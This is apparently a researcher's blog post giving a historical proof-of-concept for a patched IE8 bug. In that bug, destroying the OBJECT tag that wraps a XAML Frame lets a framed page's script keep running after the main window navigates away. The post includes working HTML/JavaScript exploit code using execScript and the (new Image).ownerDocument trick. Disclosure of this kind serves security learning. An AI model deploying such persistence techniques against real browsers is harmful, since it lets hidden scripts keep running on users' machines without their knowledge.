Resident Script via XAML Frame — Destroy the Object Tag

Loading an HTML page inside a XAML Frame element (which IE wraps in an auto-generated OBJECT tag), then destroying that OBJECT tag while keeping the inner HTML page alive, allows the script in the HTML page to survive after the main window navigates away. The trick to accessing the XAML document uses a shortcut credited to Gareth Heyes: (new Image).ownerDocument.

<!-- index.html: loads XAML inside an iframe -->
<iframe src="resident_wrapper.xaml" width="200" height="100"></iframe>

<script language="JavaScript">
function destroyXaml()
{
    if (document.readyState != "complete")
        return alert("The XAML page has not been fully loaded yet.");

    // Gareth Heyes's shortcut to access the document holding the XAML
    window[0].execScript("parent.document_that_holds_the_xaml = (new Image).ownerDocument");

    var objectWithXAML = document_that_holds_the_xaml.all[0];
    objectWithXAML.outerHTML = "";
    location.replace("http://www.google.com");
}
</script>

The resident_wrapper.xaml contains <Frame Source="resident.html" />. When the OBJECT tag is destroyed and the main page navigates to Google, the resident.html content keeps running. The fact that scripts can reach outside the browser window is a separate reported issue (WOOBR #975256) — this PoC focuses only on the residency aspect. Tested on IE8/XP and IE8/Win7.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — Access Violation in DevTools with Framed Feeds] :: [Pop-up Blocker Bypass via Frozen Event and Document Destroy] >